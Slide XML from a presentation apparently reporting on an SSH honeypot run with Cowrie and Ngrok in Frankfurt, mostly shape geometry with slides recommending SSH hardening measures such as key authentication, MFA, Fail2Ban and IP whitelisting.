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embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Liter" charset="-122" pitchFamily="34"/>
      <p:regular r:id="rId18"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MiSans" charset="-122" pitchFamily="34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/Relationships>
</file>

<file path=ppt/media/>
</file>

<file path=ppt/media/image-1-1.jpg>
</file>

<file path=ppt/media/image-11-1.jp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ba7ebb3d0da1e3d31e4250b42ae8f754329da3b9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0" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="39141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547188"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="6547188">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="6547188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6547188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91919">
                  <a:alpha val="95000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="191919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271588"/>
            <a:ext cx="1524000" cy="390525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1524000" h="390525">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1485900" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1506942" y="0"/>
                  <a:pt x="1524000" y="17058"/>
                  <a:pt x="1524000" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1524000" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1524000" y="373467"/>
                  <a:pt x="1506942" y="390525"/>
                  <a:pt x="14859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381125"/>
            <a:ext cx="127218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Report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95475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SSH Honeypot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&amp;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Analysis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15528" y="47434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134715" y="171450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="140207" y="171450"/>
                  <a:pt x="144661" y="166996"/>
                  <a:pt x="144661" y="161505"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144661" y="128521"/>
                  <a:pt x="117939" y="101798"/>
                  <a:pt x="84955" y="101798"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="65064" y="101798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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671513" y="4695825"/>
            <a:ext cx="1352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Maxwell Mwangi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279303" y="47434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42863" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="36935" y="0"/>
                  <a:pt x="32147" y="4789"/>
                  <a:pt x="32147" y="10716"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32147" y="21431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21431" y="21431"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9611" y="21431"/>
                  <a:pt x="0" y="31042"/>
                  <a:pt x="0" y="42863"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="58936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150019" y="58936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150019" y="42863"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="150019" y="31042"/>
                  <a:pt x="140408" y="21431"/>
                  <a:pt x="128588" y="21431"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="117872" y="21431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117872" y="10716"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="117872" y="4789"/>
                  <a:pt x="113083" y="0"/>
                  <a:pt x="107156" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101229" y="0"/>
                  <a:pt x="96441" y="4789"/>
                  <a:pt x="96441" y="10716"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96441" y="21431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53578" y="21431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53578" y="10716"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="53578" y="4789"/>
                  <a:pt x="48790" y="0"/>
                  <a:pt x="42863" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="75009"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="139303"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="151124"/>
                  <a:pt x="9611" y="160734"/>
                  <a:pt x="21431" y="160734"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="128588" y="160734"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="140408" y="160734"/>
                  <a:pt x="150019" y="151124"/>
                  <a:pt x="150019" y="139303"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="150019" y="75009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7500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0" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2535287" y="4695825"/>
            <a:ext cx="1057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2026-02-06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5763" y="5853113"/>
            <a:ext cx="933450" cy="619125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="933450" h="619125">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="895349" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="916392" y="0"/>
                  <a:pt x="933450" y="17058"/>
                  <a:pt x="933450" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="933450" y="581024"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="933450" y="602067"/>
                  <a:pt x="916392" y="619125"/>
                  <a:pt x="895349" y="619125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38101" y="619125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="619125"/>
                  <a:pt x="0" y="602067"/>
                  <a:pt x="0" y="5810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42925" y="5962650"/>
            <a:ext cx="57090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Duration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42925" y="6162675"/>
            <a:ext cx="695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 Hours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553766" y="5853113"/>
            <a:ext cx="1200150" cy="619125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1200150" h="619125">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1162049" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1183092" y="0"/>
                  <a:pt x="1200150" y="17058"/>
                  <a:pt x="1200150" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1200150" y="581024"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1200150" y="602067"/>
                  <a:pt x="1183092" y="619125"/>
                  <a:pt x="1162049" y="619125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38101" y="619125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="619125"/>
                  <a:pt x="0" y="602067"/>
                  <a:pt x="0" y="5810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710928" y="5962650"/>
            <a:ext cx="57804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Location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710928" y="6162675"/>
            <a:ext cx="962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Frankfurt, EU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988320" y="5853113"/>
            <a:ext cx="1352550" cy="619125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1352550" h="619125">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1314449" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1335492" y="0"/>
                  <a:pt x="1352550" y="17058"/>
                  <a:pt x="1352550" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1352550" y="581024"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1352550" y="602067"/>
                  <a:pt x="1335492" y="619125"/>
                  <a:pt x="1314449" y="619125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38101" y="619125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="619125"/>
                  <a:pt x="0" y="602067"/>
                  <a:pt x="0" y="5810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3145482" y="5962650"/>
            <a:ext cx="39216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3145482" y="6162675"/>
            <a:ext cx="1114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Cowrie + Ngrok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1428750" cy="314325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1428750" h="314325">
                <a:moveTo>
                  <a:pt x="38099" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1390651" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1411692" y="0"/>
                  <a:pt x="1428750" y="17058"/>
                  <a:pt x="1428750" y="38099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1428750" y="276226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1428750" y="297267"/>
                  <a:pt x="1411692" y="314325"/>
                  <a:pt x="139065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 w="12700">
            <a:solidFill>
              <a:srgbClr val="10B98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4825" y="476250"/>
            <a:ext cx="1245394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Defense Strategy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191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 Recommendations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09713"/>
            <a:ext cx="3695700" cy="4314825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3695700" h="431482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238620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3695700" y="4280707"/>
                  <a:pt x="3661582" y="4314825"/>
                  <a:pt x="3619495" y="4314825"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76205" y="4314825"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34118" y="4314825"/>
                  <a:pt x="0" y="4280707"/>
                  <a:pt x="0" y="42386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4375" y="1838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18002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Authentication Hardening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5788" y="231933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04850" y="24384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8101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161924" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="182953" y="0"/>
                  <a:pt x="200025" y="17072"/>
                  <a:pt x="200025" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="200025" y="190499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="200025" y="211528"/>
                  <a:pt x="182953" y="228600"/>
                  <a:pt x="1619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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704850" y="2438400"/>
            <a:ext cx="2571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79289" y="2457450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Key-Based Authentication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4850" y="274320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Disable password authentication where possible. Use SSH keys with strong passphrases.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5788" y="329088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04850" y="340995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6" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704850" y="340995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99976" y="342900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Multi-Factor Authentication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04850" y="371475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 MFA for all SSH access. Adds critical layer beyond credentials.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5788" y="426243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04850" y="438150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1" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704850" y="438150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01018" y="4400550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Strong Password Policies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4850" y="468630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Enforce complexity requirements. Eliminate default or weak passwords.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85788" y="5233988"/>
            <a:ext cx="3295650" cy="390525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3295650" h="390525">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3257550" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3278592" y="0"/>
                  <a:pt x="3295650" y="17058"/>
                  <a:pt x="3295650" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3295650" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3295650" y="373467"/>
                  <a:pt x="3278592" y="390525"/>
                  <a:pt x="32575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10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="1270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733425" y="536257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65388" y="85725"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="67017" y="80747"/>
                  <a:pt x="70277" y="76237"/>
                  <a:pt x="73960" y="72353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81260" y="64673"/>
                  <a:pt x="85725" y="54293"/>
                  <a:pt x="85725" y="42863"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85725" y="19199"/>
                  <a:pt x="66526" y="0"/>
                  <a:pt x="42862" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19199" y="0"/>
                  <a:pt x="0" y="19199"/>
                  <a:pt x="0" y="42863"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="54293"/>
                  <a:pt x="4465" y="64673"/>
                  <a:pt x="11765" y="72353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15448" y="76237"/>
                  <a:pt x="18730" y="80747"/>
                  <a:pt x="20337" y="85725"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="65365" y="85725"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="64294" y="96441"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21431" y="96441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21431" y="100013"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21431" y="109880"/>
                  <a:pt x="29423" y="117872"/>
                  <a:pt x="39291" y="117872"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46434" y="117872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="56302" y="117872"/>
                  <a:pt x="64294" y="109880"/>
                  <a:pt x="64294" y="100013"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="64294" y="96441"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41077" y="25003"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="32192" y="25003"/>
                  <a:pt x="25003" y="32192"/>
                  <a:pt x="25003" y="41077"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25003" y="44046"/>
                  <a:pt x="22614" y="46434"/>
                  <a:pt x="19645" y="46434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16676" y="46434"/>
                  <a:pt x="14288" y="44046"/>
                  <a:pt x="14288" y="41077"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14288" y="26276"/>
                  <a:pt x="26276" y="14288"/>
                  <a:pt x="41077" y="14288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44046" y="14288"/>
                  <a:pt x="46434" y="16676"/>
                  <a:pt x="46434" y="19645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46434" y="22614"/>
                  <a:pt x="44046" y="25003"/>
                  <a:pt x="41077" y="25003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6" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904875" y="5353050"/>
            <a:ext cx="2914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Eliminates 97% of credential-based attacks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246513" y="1509713"/>
            <a:ext cx="3695700" cy="4314825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3695700" h="431482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238620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3695700" y="4280707"/>
                  <a:pt x="3661582" y="4314825"/>
                  <a:pt x="3619495" y="4314825"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76205" y="4314825"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34118" y="4314825"/>
                  <a:pt x="0" y="4280707"/>
                  <a:pt x="0" y="42386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441775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4563219" y="18383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0" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5013275" y="1800225"/>
            <a:ext cx="139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Security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446538" y="231933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4565600" y="243840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3" name="Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565600" y="243840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861620" y="2457450"/>
            <a:ext cx="1314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Change Default Ports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65600" y="274320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Move SSH off port 22 to reduce automated scanning visibility.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46538" y="329088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4565600" y="340995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8" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565600" y="340995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860131" y="3429000"/>
            <a:ext cx="122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 Fail2Ban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565600" y="371475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Block IPs after multiple failed login attempts. Automated protection.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46538" y="4262438"/>
            <a:ext cx="3295650" cy="695325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3295650" h="695325">
                <a:moveTo>
                  <a:pt x="38097" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3257553" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3278579" y="0"/>
                  <a:pt x="3295650" y="17071"/>
                  <a:pt x="3295650" y="38097"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3295650" y="657228"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3295650" y="678254"/>
                  <a:pt x="3278579" y="695325"/>
                  <a:pt x="3257553" y="695325"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38097" y="695325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17071" y="695325"/>
                  <a:pt x="0" y="678254"/>
                  <a:pt x="0" y="657228"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="38097"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17071"/>
                  <a:pt x="17071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4565600" y="438150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3" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565600" y="438150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862661" y="4400550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IP Whitelisting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565600" y="4686300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Restrict SSH access to known IP ranges. Limit attack surface.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446538" y="5233988"/>
            <a:ext cx="3295650" cy="390525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3295650" h="390525">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3257550" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3278592" y="0"/>
                  <a:pt x="3295650" y="17058"/>
                  <a:pt x="3295650" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3295650" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3295650" y="373467"/>
                  <a:pt x="3278592" y="390525"/>
                  <a:pt x="32575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1270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4594175" y="536257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65388" y="85725"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="67017" y="80747"/>
                  <a:pt x="70277" y="76237"/>
                  <a:pt x="73960" y="72353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81260" y="64673"/>
                  <a:pt x="85725" y="54293"/>
                  <a:pt x="85725" y="42863"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85725" y="19199"/>
                  <a:pt x="66526" y="0"/>
                  <a:pt x="42862" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19199" y="0"/>
                  <a:pt x="0" y="19199"/>
                  <a:pt x="0" y="42863"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="54293"/>
                  <a:pt x="4465" y="64673"/>
                  <a:pt x="11765" y="72353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15448" y="76237"/>
                  <a:pt x="18730" y="80747"/>
                  <a:pt x="20337" y="85725"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="65365" y="85725"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="64294" y="96441"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21431" y="96441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21431" y="100013"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21431" y="109880"/>
                  <a:pt x="29423" y="117872"/>
                  <a:pt x="39291" y="117872"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46434" y="117872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="56302" y="117872"/>
                  <a:pt x="64294" y="109880"/>
                  <a:pt x="64294" y="100013"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="64294" y="96441"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41077" y="25003"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="32192" y="25003"/>
                  <a:pt x="25003" y="32192"/>
                  <a:pt x="25003" y="41077"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25003" y="44046"/>
                  <a:pt x="22614" y="46434"/>
                  <a:pt x="19645" y="46434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16676" y="46434"/>
                  <a:pt x="14288" y="44046"/>
                  <a:pt x="14288" y="41077"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14288" y="26276"/>
                  <a:pt x="26276" y="14288"/>
                  <a:pt x="41077" y="14288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44046" y="14288"/>
                  <a:pt x="46434" y="16676"/>
                  <a:pt x="46434" y="19645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46434" y="22614"/>
                  <a:pt x="44046" y="25003"/>
                  <a:pt x="41077" y="2500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8" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765625" y="5353050"/>
            <a:ext cx="2914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Reduces automated attack volume by 80%+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07263" y="1509713"/>
            <a:ext cx="3695700" cy="4314825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3695700" h="431482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238620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3695700" y="4280707"/>
                  <a:pt x="3661582" y="4314825"/>
                  <a:pt x="3619495" y="4314825"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76205" y="4314825"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34118" y="4314825"/>
                  <a:pt x="0" y="4280707"/>
                  <a:pt x="0" y="42386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8302526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435876" y="1838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52" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8874026" y="1800225"/>
            <a:ext cx="1600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Advanced Defenses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307288" y="231933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8426351" y="2438400"/>
            <a:ext cx="209550" cy="228600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="209550" h="228600">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171450" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="192492" y="0"/>
                  <a:pt x="209550" y="17058"/>
                  <a:pt x="209550" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="209550" y="190500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="209550" y="211542"/>
                  <a:pt x="192492" y="228600"/>
                  <a:pt x="171450" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38100" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="228600"/>
                  <a:pt x="0" y="211542"/>
                  <a:pt x="0" y="190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55" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426351" y="2438400"/>
            <a:ext cx="2667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713589" y="2457450"/>
            <a:ext cx="1162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Intelligence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26351" y="274320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Integrate threat feeds to block known malicious IPs automatically.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07288" y="329088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8426351" y="340995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0" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426351" y="340995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725198" y="3429000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IoT Segmentation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426351" y="371475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Isolate IoT devices on separate network segments. Limit lateral movement.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307288" y="4262438"/>
            <a:ext cx="3295650" cy="847725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3295650" h="847725">
                <a:moveTo>
                  <a:pt x="38097" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3257553" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3278593" y="0"/>
                  <a:pt x="3295650" y="17057"/>
                  <a:pt x="3295650" y="38097"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3295650" y="809628"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3295650" y="830668"/>
                  <a:pt x="3278593" y="847725"/>
                  <a:pt x="3257553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8426351" y="4381500"/>
            <a:ext cx="219075" cy="228600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="219075" h="228600">
                <a:moveTo>
                  <a:pt x="38099" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180976" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="202017" y="0"/>
                  <a:pt x="219075" y="17058"/>
                  <a:pt x="219075" y="38099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="219075" y="190501"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219075" y="211542"/>
                  <a:pt x="202017" y="228600"/>
                  <a:pt x="180976" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38099" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="228600"/>
                  <a:pt x="0" y="211542"/>
                  <a:pt x="0" y="1905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5" name="Text 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426351" y="4381500"/>
            <a:ext cx="2762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723412" y="4400550"/>
            <a:ext cx="168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Forwarding Monitoring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426351" y="4686300"/>
            <a:ext cx="3114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Alert on SSH tunnel creation attempts. May indicate compromise.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307288" y="5233988"/>
            <a:ext cx="3295650" cy="390525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3295650" h="390525">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3257550" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3278592" y="0"/>
                  <a:pt x="3295650" y="17058"/>
                  <a:pt x="3295650" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3295650" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3295650" y="373467"/>
                  <a:pt x="3278592" y="390525"/>
                  <a:pt x="32575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8454926" y="5362575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65388" y="85725"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="67017" y="80747"/>
                  <a:pt x="70277" y="76237"/>
